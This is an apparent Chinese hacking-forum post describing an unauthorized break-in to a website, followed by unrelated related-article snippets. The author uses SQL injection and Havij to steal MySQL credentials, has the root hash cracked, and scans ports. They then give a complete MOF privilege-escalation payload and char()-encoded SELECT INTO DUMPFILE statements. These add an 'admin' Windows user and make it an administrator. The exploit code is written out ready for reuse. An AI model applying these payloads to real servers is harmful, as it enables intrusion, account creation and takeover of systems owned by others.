扫到一个站的注入
<ignore_js_op> 
在havij中得到mysql数据库中mysql库保存的数据库密码:
<ignore_js_op> 
有时候发现1.15版的还是最好用,最稳定,虽然速度慢了一点。
照样放到坛子里让机油破了
<ignore_js_op> 
感谢Mr.Lu。顺便吐槽下,cmd5连个root都要收费。。。
在等着密码破解出来的时候顺便nmap了一下
<ignore_js_op> 
意外发现端口改到了1126,给后面省下了不少时间。
照常外连试试
<ignore_js_op> 
上个帖子里面有基友问这个软件是什么,我用的是navicat,感觉很好用的
现在的常规思路就是得到绝对路径,写一个小马,再进一步渗透。
但是网站上面暴不出路径,看看mysql的路径
用select @@basedir;命令可以看到;
<ignore_js_op> 
网站的路径大概差不多了,懒得一个一个试了,最近mof提权挺火的,上次失败了一次,这次再来试试好了。
Mof的科普文很多,大家有兴趣看看网盘链接这两个,很详细的,大家共同学习;

http://pan.baidu.com/share/link?shareid=438074&uk=101689864

http://pan.baidu.com/share/link?shareid=438077&uk=101689864mof文件内容为:

  1. #pragma namespace("\\\\.\\root\\subscription")
  2. instance of __EventFilter as $EventFilter
  3. {
  4. EventNamespace = "Root\\Cimv2";
  5. Name  = "filtP2";
  6. Query = "Select * From __InstanceModificationEvent "
  7. "Where TargetInstance Isa \"Win32_LocalTime\" "
  8. "And TargetInstance.Second = 5";
  9. QueryLanguage = "WQL";
  10. };
  11. instance of ActiveScriptEventConsumer as $Consumer
  12. {
  13. Name = "consPCSV2";
  14. ScriptingEngine = "JScript";
  15. ScriptText =
  16. "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
  17. };
  18. instance of __FilterToConsumerBinding
  19. {
  20. Consumer   = $Consumer;
  21. Filter = $EventFilter;
  22. };

复制代码

于没有马,不能按照网盘里面说的先传一个mof上去,我就直接一次性写入。
先是试了试直接将原来的语句写入,提示失败,原因就是语句里面很多“;回车”之类的符号。
然后就想转化为16进制或者asc码这样。
先试了16进制。
等了老半天什么还是登陆不上去,就放弃了,改用asc码,用的sql语句为:

  1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

复制代码

效果就是添加一个用户admin密码admin;
等了有5秒,登陆框的提示从
<ignore_js_op> 
变成了
<ignore_js_op> [size=0.83em]17 小时前 上传
下载附件 [size=0.83em](51.04 KB)

这时候才意识到一个问题,上面的语句只添加了用户,忘了提升为管理员了。。。
好吧,重新写一遍mof

  1. select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

复制代码

好了,这样就顺利登进去了;
<ignore_js_op>

改天研究一下一次性完成添加管理员试试

现在默认它还是会过5s添加一次用户,解决方法就是:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务
还有其他方法在网盘的文件里面有写。

一路看起来挺顺利的,是因为上次研究过这个。这次写的详细点了。

无shell情况下的mysql远程mof提权利用方法详解的更多相关文章

  1. MySQL服务器线程数的查看方法详解

    本文实例讲述了MySQL服务器线程数的查看方法.分享给大家供大家参考,具体如下: mysql重启命令: ? 1 /etc/init.d/mysql restart MySQL服务器的线程数需要在一个合 ...

  2. 如何在删除ibdata1和ib_logfile的情况下恢复MySQL数据库

    昨天,有个朋友对公司内部使用的一个MySQL实例开启binlog,但是在启动的过程中失败了(他也没提,为何会失败),在启动失败后,他删除了ibdata1和ib_logfile,后来,能正常启动了,但所 ...

  3. KVM虚拟机内无agent情况下的监控方法

    KVM虚拟机内无agent情况下的监控(ceilometer实现) 今天看到大家在群里讨论KVM虚拟机的监控问题,而且是要求VM内无agent情况下的监控.这方面确实没有深入研究,但尚有些openst ...

  4. 关于img标签浏览器自带的边框,清除边框的解决方式(即img[src=""] img无路径情况下,灰色边框去除解决方法)

    详解img[src=""] img无路径情况下,灰色边框去除解决方法 1.Js解决办法 <html> <head> <meta charset=&qu ...

  5. mysql 远程连接数据库的二种方法

    http://blog.csdn.net/freecodetor/article/details/5799550 一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5 ...

  6. mysql 远程连接数据库的二种方法

    一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5.116),端口"3306",用户名为"root",密码"123 ...

  7. 转 mysql 远程连接数据库的二种方法

    mysql 远程连接数据库的二种方法   一.连接远程数据库: 1.显示密码 如:MySQL 连接远程数据库(192.168.5.116),端口“3306”,用户名为“root”,密码“123456” ...

  8. Centos下忘记mysql的root密码的解决方法

    Centos下忘记mysql的root密码的解决方法 一:(停掉正在运行的mysql) [root@NetDakVPS ~]# service mysql stop 二:使用 “--skip-gran ...

  9. 【转】CentOS6下安装mysql后,重置root密码方法

    本文转自:CentOS6下安装mysql后,重置root密码方法 centos下安装mysql,居然不知道root用户密码,本想重装,不过还是先度娘了一些,发现这篇文章,刚好解决我的燃眉之急,太赞了. ...

随机推荐

  1. 基于反射的通过set方法的依赖注入,可以看成一种设计模式,自己来用

    非常好用,在properties文件中配置字符串和类名之间的对应,在程序里读取文件,找到类名,通过反射,达到调用set方法的目的,然后直接将自己的指向其他类的对象的引用赋值,指向实体对象. 比如use ...

  2. Date的转换

    SimpleDateFormat sdf = new SimpleDateFormat("yyyy-MM-dd"); String str = sdf.format(一个date对 ...

  3. Tomcat的目录结构(二)

    一.Tomcat的目录结构 bin:启动和关闭Tomcat的bat文件 conf:配置文件 server.xml:配置和server相关的信息,比如:Tomcat启动的端口号,配置Host,配置Con ...

  4. About Closure

    Closure被翻译为闭包,C++11引入了Lambda表达式支持Closure,JavaScript支持Closure,Objective C支持Blocks,他们都是Closure,名字各有不同, ...

  5. HashMap简单理解

    1. hashmap基于哈希表的map接口实现,此实现提供所有可选的映射操作,并允许使用 null 值和 null 键.(除了非同步和允许使用 null 之外,HashMap 类与 Hashtable ...

  6. iOS弹框

    IOS 弹框 如果直接弹出一个自定义的视图 可以选用第三方: MJPopup 弹出: if(!bandview) { bandview=[[[NSBundle mainBundle]loadNibNa ...

  7. 利用pl/sql developer进行远程连接oracle server出现的问题及解决办法

    由于本人刚刚给自己的笔记本做了系统,由原来的32位系统编程现在的64位系统,所以,很多软件由于兼容性,不得不重新安装...当我安完了pl/sql developer工具后,就满心欢喜的去连接远程ora ...

  8. JAVA判断当前时间是上午am还是下午pm

    //结果为"0"是上午 结果为"1"是下午 public class GregorianTest { public static void main(Strin ...

  9. PHP 防范IP攻击

    <?php //查询禁止IP $ip =$_SERVER['REMOTE_ADDR']; $fileht=".htaccess2"; if(!file_exists($fil ...

  10. 四则运算<3>

    //李妍 2015.3.12 //四则运算新 #include<iostream> #include<fstream> #include<iomanip> #inc ...